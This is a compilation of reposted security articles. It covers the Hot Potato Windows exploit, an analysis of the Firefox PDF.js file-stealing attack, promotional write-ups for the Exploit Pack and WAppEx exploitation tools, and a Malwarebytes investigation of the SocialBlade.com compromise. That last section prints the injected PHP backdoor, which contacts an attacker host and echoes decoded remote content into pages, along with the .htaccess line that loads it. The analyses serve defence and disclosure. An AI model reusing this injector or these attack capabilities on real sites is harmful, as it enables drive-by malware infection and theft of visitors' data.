Another Door to Windows | Hot Potato exploit

Microsoft Windows versions 7, 8, 10, Server 2008 and Server 2012 vulnerable to Hot Potato exploit which gives total control of PC/laptop to hackers

Security researchers from Foxglove Security have discovered that almost all recent versions of Microsoft’s Windows operating system are vulnerable to a privilege escalation exploit. By chaining together a series of known Windows security flaws, researchers from Foxglove Security have discovered a way to break into PCs/systems/laptops running on Windows 7/8/8.1/10 and Windows Server 2008/2010.

The Foxglove researchers have named the exploit as Hot Potato. Hot Potato relies on three different types of attacks, some of which were discovered back at the start of the new millennium, in 2000. By chaining these together, hackers can remotely gain complete access to the PCs/laptops running on above versions of Windows.

Surprisingly, some of the exploits were found way back in 2000 but have still not been patched by Microsoft, with the explanation that by patching them, the company would effectively break compatibility between the different versions of their operating system.

Hot Potato

Hot Potato is a sum of three different security issues with Windows operating system. One of the flaw lies in local NBNS (NetBIOS Name Service) spoofing technique that’s 100% effective. Potential hackers can use this flaw to set up fake WPAD (Web Proxy Auto-Discovery Protocol) proxy servers, and an attack against the Windows NTLM (NT LAN Manager) authentication protocol.

Exploiting these exploits in a chained manner allows the hackers to gain access to the PC/laptop by elevating an application’s permissions from the lowest rank to system-level privileges, the Windows analog for a Linux/Android root user’s permissions.

Foxglove researchers created their exploit on top of a proof-of-concept code released by Google’s Project Zero team in 2014 and have presented their findings at the ShmooCon security conference over the past weekend.

They have also posted proof-of-concept videos on YouTube in which the researchers break Windows versions such as 7, 8, 10, Server 2008 and Server 2012.

You can also access the proof of concept on Foxglove’s GitHub page here.

Mitigation

The researchers said that using SMB (Server Message Block) signing may theoretically block the attack. Other method to stop the NTNL relay attack is by enabling “Extended Protection for Authentication” in Windows.

 

 

Credit:  Vijay Prabhu, techworm

Firefox Under Fire: Anatomy of latest 0-day attack

On the August 6th, the Mozilla Foundation released a security update for the Firefox web browser that fixes the CVE-2015-4495 vulnerability in Firefox’s embedded PDF viewer, PDF.js. This vulnerability allows attackers to bypass the same-origin policy and execute JavaScript remotely that will be interpreted in the local file context. This, in turn, allows attackers to read and write files on local machine as well as upload them to a remote server. The exploit for this vulnerability is being actively used in the wild, so Firefox users are advised to update to the latest version (39.0.3 at the time of writing) immediately.

In this blog we provide an analysis of two versions of the script and share details about the associated attacks against Windows, Linux and OS X systems.

According to ESET’s LiveGrid® telemetry, the server at the IP address 185.86.77.48, which was hosting the malicious script, has been up since July 27, 2015. Also we can find corroboration on one of the compromised forums:

image1

Operatives from the Department on Combating Cybercrime of the Ministry of Internal Affairs of Ukraine, who responded promptly to our notification, have also confirmed that the malicious exfiltration server, hosted in Ukraine, has been online since July 27, 2015.

According to our monitoring of the threat, the server became inactive on August 8, 2015.

 

The script

The script used is not obfuscated and easy to analyze. Nevertheless, the code shows that the attackers had good knowledge of Firefox internals.

The malicious script creates an IFRAME with an empty PDF blob. When Firefox is about to open the PDF blob with the internal PDF viewer (PDF.js), new code is injected into the IFRAME (Figure 2). When this code executes, a new sandboxContext property is created within wrappedJSObject. A JavaScript function is written to the sandboxContext property. This function will later be invoked by subsequent code. Together, these steps lead to the successful bypass of the same-origin policy.

Code that creates sandboxContext property

The exploit is very reliable and works smoothly. However, it may display a warning which can catch the attention of tech-savvy users.

The warning message showed on compromised site

After successful exploitation of the bug, execution passes to the exfiltration part of code. The script supports both the Linux and Windows platforms. On Windows it searches for configuration files belonging to popular FTP clients (such as FileZilla, SmartFTP and others), SVN client, instant messaging clients (Psi+ and Pidgin), and the Amazon S3 client.

The list of collected files on Windows at the first stage of attack

These configuration files may contain saved login and password details.

On the Linux systems, the script sends following files to the remote server:

  • /etc/passwd
  • /etc/hosts
  • /etc/hostname
  • /etc/issue

It also parses the /etc/passwd file in the order to get the home directories (homedir) of users on the system. The script then searches files by mask in the home directories collected, and it avoids searching in the home directories of standard system users (such as daemon, bin, sys, sync and so forth).

The list of collected files on Linux at stage 1 of attack

It collects and uploads such files as:

  • history (bash, MySQL, PostgreSQL)
  • SSH related configuration files and authorization keys
  • Configuration files for remote access software – Remmina
  • FileZilla configuration files
  • PSI+ configuration
  • text files with possible credentials and shell scripts

As is evident here, the purpose of the first version of the malicious script was to gather data used mostly by webmasters and site administrators. This allowed attackers to move on to compromising more websites.

 

The second version

The day after Mozilla released the patch for Firefox the attackers decided to go “all-in”: they registered two new domains and improved their script.

The two new malicious domains were maxcdnn[.]com (93.115.38.136) and acintcdn[.]net (185.86.77.48). The second IP address is the same one as used in the first version. Attackers selected these names because the domains look as if they belong to a content delivery network (CDN).

The improved script on the Windows platform not only collects configuration files for applications; it also collects text files containing almost all combinations of words of possible value to attackers (such as password, accounts, bitcoins, credit cards, exploits, certificates, and so on):

List of files collected on Windows during the second attack stage

The attackers improved the Linux script by adding new files to collect and also developed code that works on the Mac OS X operating system:

List of files collected on Macs during the second stage of an attack

Some Russian-speaking commentators misattributed this code to the Duqu malware, because some variables in the code have the text “dq” in them.

 

A copycat attack

Since the bug is easy to exploit and a working copy of the script is available to cybercriminals, different attackers have started to use it. We have seen that various groups quickly adopted the exploit and started to serve it, mostly on adult sites from google-user-cache[.]com (108.61.205.41)

This malicious script does all the same things as the original script, but it collects different files:

The list of collected files used in copycat attack

 

Conclusion

The recent Firefox attacks are an example of active in-the-wild exploitation of a serious software vulnerability. The exploit shows that the malware-writers had a deep knowledge of Firefox internals. It is also an interesting one, since in most cases, exploits are used as an infection vector for other data-stealing trojans. In this instance, however, that was not necessary, because the malicious script alone was able to steal sensitive files from victims’ systems.

Additionally, the exploit started to be reused by other malware operators shortly after its discovery. This is common practice in the malware world.

ESET detects the malicious scripts as JS/Exploit.CVE-2015-4495. We also urge Firefox users to update their browser to the patched version (39.0.3). The internal Firefox PDF reader can also be disabled by changing the pdfjs.disabled setting to true.

 

Indicators of Compromise

A partial list of compromised servers:

hxxp://www.akipress.org/

hxxp://www.tazabek.kg/

hxxp://www.super.kg/

hxxp://www.rusmmg.ru/

hxxp://forum.cs-cart.com/

hxxp://www.searchengines.ru/

hxxp://forum.nag.ru/

Servers used in attack:

maxcdnn[.]com (93.115.38.136)

acintcdn[.]net (185.86.77.48)

google-user-cache[.]com (108.61.205.41)

Hashes (MD5):

0A19CC67A471A352D76ACDA6327BC179547A7A25

2B1A220D523E46335823E7274093B5D44F262049

19BA06ADF175E2798F17A57FD38A855C83AAE03B

3EC8733AB8EAAEBD01E5379936F7181BCE4886B3

 
 

Credit:  Anton Cherepanov

Exploit Pack – Open Source Security Project for Penetration Testing and Exploit Development

 

Exploit Pack, is an open source GPLv3 security tool, this means it is fully free and you can use it without any kind of restriction. Other security tools like Metasploit, Immunity Canvas, or Core Impact are ready to use as well but you will require an expensive license to get access to all the features, for example: automatic exploit launching, full report capabilities, reverse shell agent customization, etc.

 

Exploit Pack is fully free, open source and GPLv3. Because this is an open source project you can always modify it, add or replace features and get involved into the next project decisions, everyone is more than welcome to participate. We developed this tool thinking for and as pentesters. As security professionals we use Exploit Pack on a daily basis to deploy real environment attacks into real corporate clients.

 

Video demonstration of the latest Exploit Pack release:

 

More than 300+ exploits
Military grade professional security tool
Exploit Pack comes into the scene when you need to execute a pentest in a real environment, it will provide you with all the tools needed to gain access and persist by the use of remote reverse agents.

 

Remote Persistent Agents
Reverse a shell and escalate privileges
Exploit Pack will provide you with a complete set of features to create your own custom agents, you can include exploits or deploy your own personalized shell-codes directly into the agent.

 

Write your own Exploits
Use Exploit Pack as a learning platform
Quick exploit development, extend your capabilities and code your own custom exploits using the Exploit Wizard and the built-in Python Editor moded to fulfill the needs of an Exploit Writer.

 

 
 

SocialBlade.com compromised, starts redirection chain to Nuclear Pack exploit kit

Update (07/29/2014): Following our notification, the developers in charge of SocialBlade.com have investigated and identified the source of the compromise. The site has been cleaned up of the malware and so far our systems have not detected anymore traces of suspicious activity. We will monitor the site for the next few days and update if required.

Update 2 (07/29/2014): SocialBlade devs were kind enough to provide us with technical server details of the attack. We are sharing those in here as well in an effort to help the many other affected site owners in quickly identifying and addressing this type of compromise. Jump to server side section

Last week, we wrote about the compromise on AskMen.com that was leading unsuspecting visitors to the Nuclear Pack exploit kit and infecting computers that were vulnerable.

In what appears to be a similar campaign, the YouTube stats tracker site SocialBlade.com is connected with malicious re-directions that also lead to the Nuclear Pack EK.

“Social Blade is a statistics driven website where you can track your Youtube progress and compare to other big youtubers to see how you are doing.”

socialblade2

The drive-by download which was detected by our honeypots is successfully blocked by Malwarebytes Anti-Exploit.

According to site tracker SimilarWeb, SocialBlade.com has a global rank of 5,791 and had around 3.6 million visits last month.

similarweb

Technical details

Traffic flow:

hxxp://socialblade.com/youtube/user/Goleyjoygame
hxxp://socialblade.com/js/jquery.js
hxxp://static.the-button.com/d2.php?ds=true&dr=1447532217
hxxp://static.pointweb.ca/pop2.php?acc=sbc%0E%97%B0%FA%DD%92%05%CAF%F8%8E%8A%D1rd+%DD%BE%89%DD%AE&nrk=6160647100
hxxp://e3dd7df0d05y.correctzoom.uni.me/
hxxp://50d88d1ad05y.correctzoom.uni.me/1406197380.swf
hxxp://50d88d1ad05y.correctzoom.uni.me/f/1406197380/7
hxxp://50d88d1ad05y.correctzoom.uni.me/1406197380.pdf
hxxp://50d88d1ad05y.correctzoom.uni.me/1406197380.htm
hxxp://50d88d1ad05y.correctzoom.uni.me/f/1406197380/5/x00520804090407000700080150050f0304045106565601;1;5
hxxp://50d88d1ad05y.correctzoom.uni.me/1406197380.jar

Website compromise:

Pinpointing exactly where the infection started was a little more complex than usual. Typically we’d see an iframe and we would be able to search for it by its string. This was not the case here, so we had to manually inspect each web session and external references.

The intruder was in a core JavaScript file: hxxp://socialblade.com/js/jquery.js

injection

Very often, rogue code is appended to the end of existing plugins but isn’t always easy to spot or shouldn’t always be flagged as bad. What gave it away was looking for the original (unaltered) version of that jquery.js and compare both. It became obvious that additional code had been injected, probably by a backdoor residing on the web server itself.

Update: Server side details

Apache server logs:

–2014-07-28 18:27:18–  http://sux.pw/p/?type=raw&id=9dc0840c
Resolving sux.pw (sux.pw)…

Cross-site contamination:

The culprit: settings2.php

<?php
if (!isset($_SESSION)) session_start();
if (!isset($_SESSION["pcid"]))
{
 $imptt_agent = getenv('HTTP_USER_AGENT');
 if(stristr($imptt_agent, 'Windows NT')&&(stristr($imptt_agent, 'MSIE')||stristr($imptt_agent, 'Trident')))
 {
 $imptt_ip = ip2long($_SERVER['REMOTE_ADDR']);
 if($imptt_ip<0) $imptt_ip += 4294967296;
 $imptt_fp = fsockopen("static.the-button.com", 80);
 if ($imptt_fp)
 {
 fputs($imptt_fp,"GET /d2.php?dr=".rand(100000000,9999999999)."&di=".$imptt_ip."&du=".urlencode($imptt_agent)." HTTP/1.0\n\n");
 while(!feof($imptt_fp)) $imptt_pt=fgets($imptt_fp,4096);
 print (base64_decode($imptt_pt));
 fclose($imptt_fp);
 $_SESSION['pcid'] = $imptt_ip;
 }
 }
}
?>

Infected .htaccess file:

The cause: an .htaccess (which had 777 perms) was loading the content of settings2.php (malicious code) into each file when the site was rendered.

php_value auto_append_file "/var/www/blog/wp-admin/network/settings2.php"

Note: the actual directory path has been ‘anonymized’ as to not reveal SocialBlade’s infrastructure.

JavaScript code analysis

Now let’s get back to the JavaScript code server to visitors. The following variable (s) is made of unicode. This technique is often used to hide obvious strings from the human eye.var_s

We can translate it to characters to see what it hides:

unicode

This gives us the URL (static.the-button.com/d2.php?) that is used as an iframe. This looks like a compromised site (too bad for the fans of the TV series Lost – go there at your own risk!).

lost

The rest of the JavaScript code writes the iframe and launches the redirection workflow. To see how it progresses we’re going to use Google Chrome’s JavaScript Console.

Because the code only fires if the user is running Internet Explorer or Firefox, we can comment out the condition so it always executes, even in Chrome.

sources

The Network tab shows us what happens when that JavaScript is loaded. We can see the first request to d2.php, followed by pop2.php. It’s worth noting this redirection only happens once per IP address.

network

Redirector #1:
hxxp://static.the-button.com/d2.php?ds=true&dr=1447532217

referer

Source code:

d2

This creates an iframe to a second redirector.

Redirector #2:
hxxp://static.pointweb.ca/pop2.php?acc=sbc%0E%97%B0%FA%DD%92%05%CAF%F8%8E%8A%D1rd+%DD%BE%89%DD%AE&nrk=6160647100

pop2

Now we have the final redirection to the exploit kit landing page (note the code obfuscation and the use of rot13 to mask the URL).

Nuclear Pack EK landing page:
hxxp://e3dd7df0d05y.correctzoom.uni.me/

landing

Flash exploit (CVE-2014-0515?):
hxxp://50d88d1ad05y.correctzoom.uni.me/1406197380.swf
VT (5/53) link

SWF

PDF exploit (CVE-2010-0188 see this detailed blog post by Quequero):
hxxp://50d88d1ad05y.correctzoom.uni.me/1406197380.pdf
VT (4/52) link

pdf_properties

Java exploit (CVE-2013-2465?):
hxxp://50d88d1ad05y.correctzoom.uni.me/1406197380.jar
VT (4/52) link

java

Internet Explorer exploit (CVE ?):
hxxp://50d88d1ad05y.correctzoom.uni.me/1406197380.htm
VT (0/53) link

IE

Payload:
hxxp://50d88d1ad05y.correctzoom.uni.me/f/1406197380/7
VT (17/52) link

Malwarebytes Anti-Malware detects this as Trojan.Agent.ED.

This downloader talks back to: icepower.su/b/shoe/75412 and then attempts to download a file from smokejuse.su/mod_articles9874.564/jquery/. This most likely leads to ad-fraud related malware (clickjacking etc.).

We have notified the owners of SocialBlade.com so they can fix the issue ASAP and prevent unnecessary malware infections.

As always, please make sure your computer is up-to-date (especially the browser and its plugins) and that you have real-time Antivirus/Anti-Malware protection. To be even one step ahead of the bad guys, feel free to consider Anti-Exploit mitigation tools that proactively detect and block malicious code behavior.

 

 

CREDIT: Jérôme Segura – Malwarebytes

WAppEx v2.0 : Web Application exploitation Tool

WAppEx is an integrated Web Application security assessment and exploitation platform designed with the whole spectrum of security professionals to web application hobbyists in mind. It suggests a security assessment model which revolves around an extensible exploit database. Further, it complements the power with various tools required to perform all stages of a web application attack.Updates in 2.0

  • Auto-detect feature deleted from exploits
  • Browser tool deleted
  • Exploits and payloads view changed
  • Exploit Database with the following features added:
    • New script syntax and structure
    • Searching, selecting, and executing of exploits.
    • Add/remove database entries (exploits or payloads)
    • Add exploits or payloads to the database using either the Exploit Wizard or the script file
    • Batch testing of multiple targets against multiple exploits
    • Execute multiple instances of one or more payloads (for every running exploit) simultaneously.
  • Following tools added:
    • Manual Request
    • Dork Finder
    • Exploit Editor
    • Hidden File Checker
    • Neighbor Site Finder
  • Local File Inclusion analyzer script updated
  • 24 new payloads for LFI, RFI, and PHP Code Execution vulnerabilities added:
    • Directory Explorer
    • CodeExec Bind
    • 3 connect-back shells
    • Code Execution
    • MySQL Dump
    • ServerInfo
    • 4 command execution payloads
  • Bug-fixes:
    • Find Login Page crashed on start
    • Problem with software registration
    • Stop button did not work when retrieving data from SQL server
    • Problem with saving SQL results
    • Crashed when closing Find Login Page
    • Status icons were not displayed properly in exploit tabs
The full list features is as below:
  • An exploit database covering a wide range of vulnerabilities.
  • A set of tools useful for penetration testing:
    • Manual Request
    • Dork Finder
    • Exploit Editor
    • Hidden File Checker
    • Neighbor Site Finder
    • Find Login Page
    • Online Hash Cracker
    • Encoder/Decoder
  • Execute multiple instances of one or more exploits simultaneously.
  • Execute multiple instances of one or more payloads (for every running exploit) simultaneously.
  • Test a list of target URL’s against a number of selected exploits.
  • Allows you to create your own exploits and payloads and share them online.
  • A number of featured exploits (6) and payloads (39) bundled within the software exploit database:
    • Testing and exploiting of Local File Inclusion vulnerabilities
    • Testing and exploiting of Local File Disclosure vulnerabilities
    • Testing and exploiting of Remote File Inclusion vulnerabilities
    • Testing and exploiting of SQL Injection vulnerabilities
    • Testing and exploiting of Remote Command Execution Inclusion vulnerabilities
    • Testing and exploiting of Server-side Code Injection vulnerabilities

     

Download Here

Credit:  Archive by The Hacker News for Hacking tools, networking tools, gmail hacking, learn ethical hacking, vulnerability assessment, penetration testing, email hacking, password hacking